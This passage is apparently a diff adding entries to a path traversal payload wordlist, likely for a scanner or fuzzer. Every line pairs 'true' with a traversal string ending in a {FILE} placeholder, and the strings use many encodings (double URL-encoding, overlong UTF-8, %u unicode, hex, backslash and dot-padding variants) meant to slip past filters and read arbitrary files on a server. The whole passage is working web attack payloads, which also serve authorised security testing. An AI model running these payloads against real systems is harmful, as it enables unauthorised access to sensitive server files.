+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
